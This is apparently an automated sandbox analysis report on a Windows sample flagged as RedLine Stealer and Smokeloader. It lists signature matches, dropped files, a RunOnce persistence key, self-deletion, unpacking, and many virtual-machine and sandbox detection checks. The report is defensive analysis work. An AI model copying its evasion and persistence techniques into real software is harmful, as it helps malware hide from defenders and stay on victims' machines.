      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D507BAB07_2_00007FF7D507BAB0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D508B6A07_2_00007FF7D508B6A0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50664A07_2_00007FF7D50664A0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A04D07_2_00007FF7D50A04D0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5065AD47_2_00007FF7D5065AD4
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5083AD07_2_00007FF7D5083AD0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5075ED07_2_00007FF7D5075ED0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50E16C07_2_00007FF7D50E16C0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D506A0F07_2_00007FF7D506A0F0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A15107_2_00007FF7D50A1510
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50759107_2_00007FF7D5075910
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C17007_2_00007FF7D50C1700
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50E3F207_2_00007FF7D50E3F20
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50719207_2_00007FF7D5071920
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A31507_2_00007FF7D50A3150
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A95507_2_00007FF7D50A9550
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50907407_2_00007FF7D5090740
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50D5D407_2_00007FF7D50D5D40
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C43707_2_00007FF7D50C4370
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50BF3707_2_00007FF7D50BF370
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50E6B707_2_00007FF7D50E6B70
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D506FB707_2_00007FF7D506FB70
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50B7D607_2_00007FF7D50B7D60
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D508D3907_2_00007FF7D508D390
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C898B7_2_00007FF7D50C898B
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C5B807_2_00007FF7D50C5B80
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A43B07_2_00007FF7D50A43B0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D507D7A07_2_00007FF7D507D7A0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D508A9D07_2_00007FF7D508A9D0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50DDFD07_2_00007FF7D50DDFD0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A57C07_2_00007FF7D50A57C0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50B6DF07_2_00007FF7D50B6DF0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50B11F07_2_00007FF7D50B11F0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50E49F07_2_00007FF7D50E49F0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D507CFF07_2_00007FF7D507CFF0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5074BF07_2_00007FF7D5074BF0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50A6DE07_2_00007FF7D50A6DE0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50929E07_2_00007FF7D50929E0
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D508FC107_2_00007FF7D508FC10
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50C20107_2_00007FF7D50C2010
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50B8C107_2_00007FF7D50B8C10
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50D4E107_2_00007FF7D50D4E10
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5084E007_2_00007FF7D5084E00
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D506C4007_2_00007FF7D506C400
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50770007_2_00007FF7D5077000
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D506BC007_2_00007FF7D506BC00
      Source: C9F5.exe.2.drStatic PE information: No import functions for PE file found
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: ajjwvsd.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@11/4@9/9
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D50DF5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,7_2_00007FF7D50DF5B0
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00849A8F CreateToolhelp32Snapshot,Module32First,0_2_00849A8F
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ajjwvsdJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeMutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4444:120:WilError_03
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C9F5.tmpJump to behavior
      Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
      Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: file.exeReversingLabs: Detection: 39%
      Source: file.exeVirustotal: Detection: 41%
      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ajjwvsd C:\Users\user\AppData\Roaming\ajjwvsd
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9F5.exe C:\Users\user\AppData\Local\Temp\C9F5.exe
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9F5.exe "C:\Users\user\AppData\Local\Temp\C9F5.exe"
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9F5.exe "C:\Users\user\AppData\Local\Temp\C9F5.exe"
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9F5.exe C:\Users\user\AppData\Local\Temp\C9F5.exeJump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9F5.exe "C:\Users\user\AppData\Local\Temp\C9F5.exe" Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C9F5.exe "C:\Users\user\AppData\Local\Temp\C9F5.exe" Jump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\file.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72eb61e0-8672-4303-9175-f2e4c68b2e7c}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.toxol:R;.gifex:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\ajjwvsdUnpacked PE file: 4.2.ajjwvsd.400000.0.unpack .text:ER;.rdata:R;.data:W;.toxol:R;.gifex:W;.rsrc:R; vs .text:EW;
      Source: file.exeStatic PE information: section name: .toxol
      Source: file.exeStatic PE information: section name: .gifex
      Source: ajjwvsd.2.drStatic PE information: section name: .toxol
      Source: ajjwvsd.2.drStatic PE information: section name: .gifex
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401CD1 push ecx; ret 0_2_00401CD2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401C91 push 00000076h; iretd 0_2_00401C93
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E96 push B92A2F4Ch; retf 0_2_00402E9B
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B1D38 push ecx; ret 0_2_005B1D39
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B1CF8 push 00000076h; iretd 0_2_005B1CFA
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B2EFD push B92A2F4Ch; retf 0_2_005B2F02
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084F4E1 push edx; ret 0_2_0084F4E2
      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085155F push FFFFFFFBh; iretd 0_2_00851575
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401CD1 push ecx; ret 4_2_00401CD2
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00401C91 push 00000076h; iretd 4_2_00401C93
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00402E96 push B92A2F4Ch; retf 4_2_00402E9B
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_0046FD51 push edx; ret 4_2_0046FD52
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_00471DCF push FFFFFFFBh; iretd 4_2_00471DE5
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A1D38 push ecx; ret 4_2_005A1D39
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A1CF8 push 00000076h; iretd 4_2_005A1CFA
      Source: C:\Users\user\AppData\Roaming\ajjwvsdCode function: 4_2_005A2EFD push B92A2F4Ch; retf 4_2_005A2F02
      Source: file.exeStatic PE information: section name: .text entropy: 7.472017406032608
      Source: ajjwvsd.2.drStatic PE information: section name: .text entropy: 7.472017406032608
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ajjwvsdJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C9F5.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ajjwvsdJump to dropped file

      Boot Survival

      barindex
      Creates autostart registry keys with suspicious names
      Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUYJump to behavior
      Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUYJump to behavior
      Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUYJump to behavior
      Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUYJump to behavior
      Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#1757_8yUscnjrUYJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes itself after installation
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ajjwvsd:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Check for Windows Defender sandbox
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeFile Queried: C:\INTERNAL\__emptyJump to behavior
      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ajjwvsdKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Queries memory information (via WMI often done to detect virtual machines)
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_DiskDrive
      Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\Desktop\file.exeAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Source: C:\Users\user\AppData\Roaming\ajjwvsdAPI/Special instruction interceptor: Address: 7FF8C88EE814
      Source: C:\Users\user\AppData\Roaming\ajjwvsdAPI/Special instruction interceptor: Address: 7FF8C88ED584
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: ajjwvsd, 00000004.00000002.2409281430.000000000045E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKC
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxSF.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmnet.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmmouse.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxtray.exeJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxhook.dllJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxGuest.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxVideo.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\vmci.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\drivers\VBoxMouse.sysJump to behavior
      Source: C:\Windows\explorer.exeFile opened / queried: C:\Windows\System32\vboxservice.exeJump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 454Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1254Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 893Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3645Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
      Source: C:\Windows\explorer.exe TID: 5896Thread sleep time: -125400s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 4320Thread sleep time: -89300s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 5896Thread sleep time: -364500s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystemProduct
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
      Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeCode function: 7_2_00007FF7D5077000 GetKeyboardLayoutList followed by cmp: cmp r8d, 00000419h and CTI: je 00007FF7D50771AFh7_2_00007FF7D5077000
      Source: explorer.exe, 00000002.00000000.2105745637.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000002.00000000.2108451661.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
